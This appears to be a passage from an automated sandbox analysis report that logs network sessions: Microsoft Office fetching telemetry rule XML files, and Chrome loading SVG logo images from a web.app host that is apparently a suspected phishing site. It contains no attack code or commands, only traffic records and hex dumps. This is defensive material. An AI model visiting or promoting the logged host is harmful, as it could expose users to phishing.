                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC1378INData Raw: 00 03 00 02 02 43 ff fa 02 4e 00 03 00 03 02 57 00 2f 02 59 00 2f 02 5b 00 2f 00 03 01 4f 00 0b 01 50 00 0b 01 51 00 0b 00 02 01 4f 00 00 01 50 00 00 00 02 01 4f 00 00 01 50 00 00 00 03 01 4f 00 64 01 50 00 64 01 51 00 64 00 03 01 4f 00 0b 01 50 00 0b 01 51 00 0b 00 02 01 4f 00 00 01 50 00 00 00 02 01 4f 00 00 01 50 00 00 00 0f 01 42 00 39 01 43 00 08 01 44 00 2f 01 45 00 23 01 46 00 23 01 49 00 41 01 4b 00 23 01 4c 00 39 01 4d 00 0f 01 4e 00 2b 01 4f 00 67 01 50 00 67 01 51 00 67 01 5c 00 50 01 98 00 3b 00 0f 01 42 00 39 01 43 00 08 01 44 00 2f 01 45 00 23 01 46 00 23 01 49 00 41 01 4b 00 23 01 4c 00 39 01 4d 00 0f 01 4e 00 2b 01 4f 00 67 01 50 00 67 01 51 00 67 01 5c 00 50 01 98 00 3b 00 0f 01 42 00 39 01 43 00 08 01 44 00 2f 01 45 00 23 01 46 00 23 01
                                                                                                                                                                                                                                                                                Data Ascii: CNW/Y/[/OPQOPOPOdPdQdOPQOPOPB9CD/E#F#IAK#L9MN+OgPgQg\P;B9CD/E#F#IAK#L9MN+OgPgQg\P;B9CD/E#F#


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                49192.168.2.64977713.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:58 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 499
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                                                x-ms-request-id: 40323690-a01e-0002-0100-175074000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144158Z-1657d5bbd48dfrdj7px744zp8s00000001s000000000p1pg
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                50192.168.2.64978013.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:58 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                                                x-ms-request-id: c530354f-501e-0016-5013-17181b000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144158Z-1657d5bbd48wd55zet5pcra0cg000000025g0000000035dp
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                51192.168.2.64978113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:58 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 471
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                                                x-ms-request-id: 7cec3a6f-e01e-0033-3414-174695000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144158Z-1657d5bbd48xlwdx82gahegw4000000002dg00000000036n
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                52192.168.2.64978213.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:58 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                                                x-ms-request-id: d415a278-e01e-0051-6efe-1684b2000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144158Z-1657d5bbd48762wn1qw4s5sd30000000022g000000001d8p
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                53192.168.2.64978313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:58 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 494
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                                                x-ms-request-id: 688d2aae-a01e-0084-3466-179ccd000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144158Z-1657d5bbd48gqrfwecymhhbfm800000000w000000000h9ha
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                54192.168.2.649789199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC383OUTGET /880ae5ba69e733fe8f2f738fae4a4697.svg HTTP/1.1
                                                                                                                                                                                                                                                                                Host: ruletridominium.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC595INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 4985
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                Etag: "c83c8c5f347b921b86cc008cbf2cdcbb6ee2495289840b8efc76bcacd9fd17f8"
                                                                                                                                                                                                                                                                                Last-Modified: Sat, 19 Feb 2022 17:52:41 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:58 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740023-EWR
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 4
                                                                                                                                                                                                                                                                                X-Timer: S1728225719.916969,VS0,VE0
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC1378INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 32 36 36 22 20 68 65 69 67 68 74 3d 22 31 31 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 37 2e 39 34 35 20 34 39 2e 33 39 35 63 2d 31 2e 39 33 38 2e 38 39 33 2d 35 2e 35 34 36 20 31 2e 36 30 35 2d 39 2e 36 34 20 31 2e 36 30 35 43 37 2e 31 32 34 20 35 31 20 30 20 34 34 2e 31 37 34 20 30 20 33 33 2e 33 33 36 20 30 20 32 33 2e 32 34 36 20 36 2e 39 32 32 20 31 35 20 31 39 2e 37 38 38 20 31 35 63 32 2e 38 34 37 20 30 20 35 2e 39 36 35 2e 35 31 33 20 38 2e 32 31 32 20 31 2e 33 36 6c 2d 31 2e 36 37 36 20 37 2e 39 37 63 2d
                                                                                                                                                                                                                                                                                Data Ascii: <svg width="266" height="111" xmlns="http://www.w3.org/2000/svg"><g fill="none" fill-rule="evenodd"><path d="M27.945 49.395c-1.938.893-5.546 1.605-9.64 1.605C7.124 51 0 44.174 0 33.336 0 23.246 6.922 15 19.788 15c2.847 0 5.965.513 8.212 1.36l-1.676 7.97c-
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC1378INData Raw: 2e 35 32 36 20 32 2e 32 32 32 20 39 2e 32 36 20 35 2e 35 38 38 20 39 2e 33 30 33 20 31 30 2e 36 31 35 43 31 34 34 20 34 36 2e 32 35 37 20 31 33 38 2e 39 39 33 20 35 31 20 31 32 39 2e 31 33 37 20 35 31 63 2d 34 2e 34 38 34 20 30 2d 38 2e 35 31 34 2d 31 2e 30 31 38 2d 31 31 2e 31 33 37 2d 32 2e 34 32 36 6c 31 2e 39 33 37 2d 37 2e 36 35 36 7a 4d 31 36 32 2e 38 36 38 20 36 76 39 2e 38 32 32 48 31 37 37 76 37 2e 38 39 38 68 2d 31 34 2e 31 33 32 76 31 32 2e 34 37 37 63 30 20 34 2e 31 35 33 20 31 2e 30 31 39 20 36 2e 30 36 38 20 34 2e 31 37 33 20 36 2e 30 36 38 20 31 2e 33 36 35 20 30 20 32 2e 34 31 37 2d 2e 31 34 36 20 33 2e 31 34 34 2d 2e 33 32 6c 2e 30 38 37 20 38 2e 31 33 34 63 2d 31 2e 33 36 37 2e 35 2d 33 2e 38 39 32 2e 39 32 31 2d 36 2e 38 35 34 2e 39 32
                                                                                                                                                                                                                                                                                Data Ascii: .526 2.222 9.26 5.588 9.303 10.615C144 46.257 138.993 51 129.137 51c-4.484 0-8.514-1.018-11.137-2.426l1.937-7.656zM162.868 6v9.822H177v7.898h-14.132v12.477c0 4.153 1.019 6.068 4.173 6.068 1.365 0 2.417-.146 3.144-.32l.087 8.134c-1.367.5-3.892.921-6.854.92
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC1378INData Raw: 20 31 33 2e 35 38 32 68 2d 32 2e 37 37 32 6c 2d 34 2e 36 32 39 2d 31 33 2e 33 33 34 63 2d 31 2e 33 35 32 2d 33 2e 39 35 36 2d 32 2e 34 35 36 2d 37 2e 35 34 38 2d 33 2e 32 35 2d 31 30 2e 38 36 33 68 2d 2e 31 30 31 63 2d 2e 30 39 39 20 33 2e 34 38 39 2d 2e 32 38 32 20 38 2e 31 35 2d 2e 35 35 36 20 31 32 2e 33 35 32 4c 31 32 39 2e 34 38 34 20 39 30 48 31 32 36 6c 31 2e 39 37 36 2d 32 38 68 34 2e 36 38 37 6c 34 2e 38 33 39 20 31 33 2e 35 35 33 63 31 2e 31 37 20 33 2e 34 32 38 20 32 2e 31 32 33 20 36 2e 35 31 32 20 32 2e 38 36 20 39 2e 34 33 34 68 2e 31 31 31 63 2e 37 34 36 2d 32 2e 38 33 36 20 31 2e 37 33 39 2d 35 2e 39 32 33 20 33 2e 30 30 36 2d 39 2e 34 33 4c 31 34 38 2e 35 34 37 20 36 32 68 34 2e 36 39 33 4c 31 35 35 20 39 30 68 2d 33 2e 36 30 37 6c 2d 2e
                                                                                                                                                                                                                                                                                Data Ascii: 13.582h-2.772l-4.629-13.334c-1.352-3.956-2.456-7.548-3.25-10.863h-.101c-.099 3.489-.282 8.15-.556 12.352L129.484 90H126l1.976-28h4.687l4.839 13.553c1.17 3.428 2.123 6.512 2.86 9.434h.111c.746-2.836 1.739-5.923 3.006-9.43L148.547 62h4.693L155 90h-3.607l-.
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC851INData Raw: 2e 34 37 39 2d 33 36 2e 37 35 32 2d 35 2e 35 30 34 7a 4d 31 31 39 2e 39 30 34 20 31 31 31 63 2d 31 2e 38 36 37 2d 34 2e 39 33 37 2d 34 2e 36 39 38 2d 39 2e 33 30 35 2d 37 2e 39 31 2d 31 33 2e 34 33 32 2d 32 2e 34 37 37 2d 33 2e 31 38 35 2d 35 2e 33 32 37 2d 35 2e 39 39 35 2d 38 2e 36 37 37 2d 38 2e 32 37 36 2d 2e 36 35 37 2d 2e 34 34 39 2d 31 2e 31 35 32 2d 2e 35 31 33 2d 31 2e 38 34 35 2d 2e 31 30 35 2d 38 2e 36 31 35 20 35 2e 30 38 38 2d 31 37 2e 36 31 20 39 2e 33 37 33 2d 32 37 2e 30 31 20 31 32 2e 37 38 36 2d 36 2e 37 38 37 20 32 2e 34 36 35 2d 31 33 2e 37 32 34 20 34 2e 33 36 34 2d 32 30 2e 39 31 35 20 35 2e 31 34 32 2d 35 2e 37 39 38 2e 36 32 37 2d 31 31 2e 35 36 37 2e 31 33 36 2d 31 37 2e 32 37 32 2d 2e 39 36 35 2d 31 33 2e 36 35 33 2d 32 2e 36 33
                                                                                                                                                                                                                                                                                Data Ascii: .479-36.752-5.504zM119.904 111c-1.867-4.937-4.698-9.305-7.91-13.432-2.477-3.185-5.327-5.995-8.677-8.276-.657-.449-1.152-.513-1.845-.105-8.615 5.088-17.61 9.373-27.01 12.786-6.787 2.465-13.724 4.364-20.915 5.142-5.798.627-11.567.136-17.272-.965-13.653-2.63


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                55192.168.2.649787199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC383OUTGET /9d77aa1062194b9635ee9a90c75217c2.svg HTTP/1.1
                                                                                                                                                                                                                                                                                Host: ruletridominium.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC595INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 3637
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                Etag: "8f6d12d5bde8f174e7ccdfa27ded8220174ce968de04ebdaf670565ea7717309"
                                                                                                                                                                                                                                                                                Last-Modified: Sat, 19 Feb 2022 17:52:41 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:58 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-nyc-kteb1890020-NYC
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                                                                                                                                                X-Timer: S1728225719.922701,VS0,VE2
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
